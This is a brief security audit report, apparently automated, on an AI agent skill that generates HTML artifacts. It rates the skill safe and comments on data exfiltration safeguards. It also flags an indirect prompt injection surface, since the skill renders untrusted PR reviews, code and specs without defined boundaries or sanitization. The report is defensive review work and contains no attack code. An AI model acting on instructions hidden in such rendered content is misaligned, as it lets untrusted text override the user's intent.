html-artifacts
Pass
Audited by Gen Agent Trust Hub on May 9, 2026
Risk Level: SAFE
Full Analysis
- [DATA_EXFILTRATION]: The instructions proactively advise the agent to avoid embedding secrets or unnecessary sensitive data in the generated artifacts. It also forbids dependencies on CDNs, remote fonts, and analytics by default, which minimizes risks associated with remote resource loading.
- [PROMPT_INJECTION]: The skill identifies a surface area for indirect prompt injection as it requires the agent to ingest and render untrusted content from the workspace (such as PR reviews and code) into HTML artifacts.
- Ingestion points: Workspace files, pull request reviews, and external technical specifications described in SKILL.md.
- Boundary markers: None explicitly defined in the instructions; the skill relies on the agent's ability to distinguish between its instructions and the data it is rendering.
- Capability inventory: The skill utilizes file system write capabilities (creating .html files) and instructs the agent to verify referenced files or commands.
- Sanitization: No specific sanitization or escaping requirements are mentioned for the content being embedded into HTML/JavaScript structures.
Audit Metadata